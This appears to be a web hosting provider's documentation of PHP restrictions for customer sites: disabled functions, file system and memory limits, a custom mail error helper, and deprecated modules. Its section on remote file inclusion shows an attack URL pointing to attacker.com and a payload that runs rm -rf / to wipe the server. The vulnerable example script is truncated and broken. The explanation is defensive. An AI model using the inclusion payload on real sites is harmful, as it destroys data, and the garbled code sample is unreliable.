Overview

The TownNews platform is shared hosting environment. This means that your web site and several others are being serviced on the same computers. The largest concerns in our hosting environment with regards to are:

  • Security - Access to files that belong to other customers, viewing passwords from other customers, and disgruntle employees trying to damage all sites on a system.
  • Resources - There are limitations to our hosting environment - we are always on the lookout for customers that fail to properly ensure their software actually scales or doesn't cause the whole system to shut down because of high CPU, disk, or memory requirements.

These reasons are why we must restrict the development environment from it's "out-of-box" behavior.

PHP Restrictions

Including Remote Files

Sometimes, PHP let's you do things it shouldn't. One of them is allowing remote files to be executed without a care. An example script that loads template files using a variable follows:

  1. <?php  
  2.    
  3. $_REQUEST['template']);  
  4.   
  5. ?>  

The above script is dangerous on most PHP installations. The author was probably intending this to be a simple template system - something like:

http://www.example.com/load.php?template=template.html

However, an attacker would exploit this script by doing something like this:

http://www.example.com/load.php?template=http://www.attacker.com/delete_everything.txt

The attacker's "text" document would contain something like:

  1. <?php  
  2.   
  3. require_once 'System.php';  
  4. System::rm('-rf /');  
  5.   
  6. ?>  

PHP would download the document from the remote host and execute the code locally - deleting everything on the system the web server has access to.

We've taken the liberty of "correcting" this issue by disabling remote inclusion of files for execution, but still allowing remote files to be downloaded for output purposes. The following functions have remote file download capabilities disabled entirely:

  • include()
  • include_once()
  • require()
  • require_once()

Disabled Functions

The following functions cannot be accessed from a PHP script:

  • apache_child_terminate
  • apache_get_modules
  • apache_get_version
  • apache_getenv
  • apache_lookup_uri
  • apache_note
  • apache_reset_timeout
  • apache_setenv
  • chgrp
  • chmod
  • chown
  • clearstatcache
  • disk_free_space
  • disk_total_space
  • diskfreespace
  • get_current_user
  • get_declared_classes
  • get_declared_interfaces
  • get_declared_traits
  • get_defined_constants
  • get_extension_funcs
  • get_included_files
  • get_loaded_extensions
  • get_required_files
  • highlight_file
  • ini_get_all
  • lchgrp
  • lchown
  • pfsockopen
  • php_ini_loaded_file
  • php_ini_scanned_files
  • php_ini_scanned_files
  • php_logo_guid
  • php_sapi_name
  • php_uname
  • phpcredits
  • phpinfo
  • posix_getlogin
  • posix_kill
  • posix_mkfifo
  • posix_mknod
  • posix_setsid
  • posix_setuid
  • posix_ttyname
  • proc_close
  • proc_get_status
  • proc_nice
  • proc_open
  • proc_terminate
  • realpath_cache_get
  • session_save_path
  • shell_exec
  • show_source
  • socket_select
  • stream_select
  • umask
  • virtual
  • zend_logo_guid

Safe-Mode Aware Functions

  • exec()
  • passthru()
  • proc_open()
  • system()
  • popen()
  • dl() 
  • php_uname()
  • curl()
  • mail()

Restricted File System

Unlike other mass virtual hosting providers, TownNews has modified our PHP distributions to limit access within the programming environment to each web site. Essentially, your scripts have access to a limited number of locations on the file system. These restrictions help prevent exploits found in other web site's code from being used to damage your web site.

BLOX access:

Other areas of the system are not available for general use. Note that this applies to PHP only. FTP access is available to data folders.

BLOX Extensions

BLOX /app sites have the following extensions preloaded and available:

  • curl
  • fileinfo
  • ftp
  • gd
  • gettext
  • json
  • mbstring
  • sqlite
  • sqlite3
  • uuid
  • zip

Memory Restrictions

Your script, including all of the class code and variable data, can only use up to 10MB of RAM (20MB on BLOX sites). This restriction also causes file uploads to be limited to about 7MB. Your script will automatically be terminated if it exceeds this limit.

Additionally, a safety net for PHP memory leaks is imposed on each Apache process - if somehow your script consumes more than 150MB in the form of a leak - it will be killed without warning. A prime example of this is the mysql_query() function, which loads the entire result set in memory for use with the PHP script. You would be well-advised to use mysql_unbuffered_query() instead.

mail_strerror

This function was written by TownNews is order to return a more detailed list of errors. A example of usage can be seen below, as well as a list of returned errors.

  1. <?php  
  2.   
  3. if(!($err = mail("root@townnews.com", "test", "test"))) {   
  4.     echo "The error is: ".mail_strerror($err)."\n";  
  5. }   
  6.   
  7. ?>  

if the mail function returns false, mail_last_error() can be called, the record code from that is an integar which has the following meanings:

0
Mail was successfully delivered
-101
An error occurred while creating a temporary delivery file
-102
The FROM: field cannot contain more than one email address
-103
Mail messages cannot be addressed to more than 3 recipients
-104
The subject line cannot exceed 250 characters
-105
One or more of the recipients are blacklisted
-106
The rate limit for this address has been reached
-107
Unable to connect to SMTP mail server
-108
Unable to set from address
-109
No valid SMTP recipients
-110
Error while sending DATA
-111
Unable to finalize SMTP transaction
*
An unknown error has occurred

Otherwise, you can call mail_strerror() which will return the text based error

Deprecated modules and extensions

As of PHP 5.4.28 the following modules or extensions are deprecated:

  • mysql extension now uses mysqlnd internally
  • mime magic support is removed
  • sqlite2 is removed
  • sqlite3 function is deprecated and will be removed in PHP5.5, switch to PDO sqlite
  • mysql extension is deprecated and will be removed in a future release, switch to PDO mysql
  • PHAR module was removed
  • PEAR modules removed - 
    • XML_Serializer,XML_RPC,HTTP_Request,Net_URL,XML_Tree,HTML_Form,Net_DNS,DB,Auth_SASL,Mail_mimeDecode,Net_DIME,XML_RSS,Net_NNTP,Request2,Net_URL2,Net_DNS2,Log,Mail_Mime,File_Find,XML_Parser2,Net_Socket,Net_SMTP,Mail,HTTP2,PHP_Archive

As of PHP 5.5.13 the following modules or extensions are deprecated:

  • legacy sqlite3.so extension in favor of PDO sqlite
  • mime magic support is removed